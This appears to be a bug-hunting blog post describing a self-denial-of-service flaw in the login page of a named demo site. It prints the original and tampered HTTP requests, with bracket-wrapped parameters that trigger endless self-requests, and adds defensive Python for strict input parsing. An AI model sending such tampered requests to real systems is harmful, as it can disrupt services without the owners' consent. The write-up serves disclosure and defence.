From now onwards I am starting a series of my real-world bug hunting case studies. This is the first draft of it. I was performing black-box testing of this website.
Bug submission: 2014-05-24 19:57:48 UTC
URL: pamedia.lastmiledemo.com/cgi-bin/default.php?appname=login
Affected parameters: username, password, login
Description: This flaw existed on the login panel. I was tampering with various parameters in the hope that the web application would behave unexpectedly. So I inserted [ and ] between all parameters and their values in order to generate an error message; however, after submitting the tampered request, I found that the application generates an infinite number of self-requests to the application.
Impact: There is no direct business impact of this vulnerability; however, a self-DoS attack comes under security best practices. Also, it may consume a small amount of network bandwidth on the client side.
Original Request:
Host: pamedia.lastmiledemo.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://pamedia.lastmiledemo.com/cgi-bin/default.php?appname=login
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 41

username=asdas&password=asdas&Login=Login

Tampered Request:
Host: pamedia.lastmiledemo.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://pamedia.lastmiledemo.com/cgi-bin/default.php?appname=login
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 41

[username]=[asdas]&[password]=[asdas]&[Login]=[Login]

In order to know the business impact, kindly refer to this video carefully.
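
A server-side check for the two request bodies above, as an added example (this is not code from the tested application, whose source was not visible in this black-box test): the login body is parsed strictly and anything other than the three expected fields is answered with a single 400, with no redirect or re-render. The field names come from the original request; the function names, the exception class and MAX_VALUE_LEN are assumptions made for illustration.

```python
from urllib.parse import parse_qsl

# Field names taken from the original request on this page.
EXPECTED_FIELDS = ("username", "password", "Login")
MAX_VALUE_LEN = 128  # assumed limit, not from the page


class BadLoginRequest(ValueError):
    """Raised when the login body is not exactly the expected form."""


def parse_login_body(raw_body: str) -> dict:
    """Parse a urlencoded login body and reject unexpected shapes.

    Unknown, duplicated or missing field names are rejected, so a body such
    as "[username]=[asdas]" never reaches the authentication logic.
    """
    try:
        pairs = parse_qsl(raw_body, keep_blank_values=True, strict_parsing=True)
    except ValueError as exc:
        raise BadLoginRequest(f"malformed body: {exc}") from exc

    fields = {}
    for name, value in pairs:
        if name not in EXPECTED_FIELDS:
            raise BadLoginRequest(f"unexpected field name: {name!r}")
        if name in fields:
            raise BadLoginRequest(f"duplicate field: {name!r}")
        if len(value) > MAX_VALUE_LEN:
            raise BadLoginRequest(f"value too long for {name!r}")
        fields[name] = value

    missing = [f for f in EXPECTED_FIELDS if f not in fields]
    if missing:
        raise BadLoginRequest(f"missing fields: {missing}")
    return fields


def handle_login_post(raw_body: str) -> tuple:
    """Return (status, message); a rejected body ends here with no redirect."""
    try:
        fields = parse_login_body(raw_body)
    except BadLoginRequest as exc:
        return 400, str(exc)
    return 200, f"credentials check would run for {fields['username']!r}"
```
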
Thanks! A few more logical bugs are coming in the near future. Stay tuned!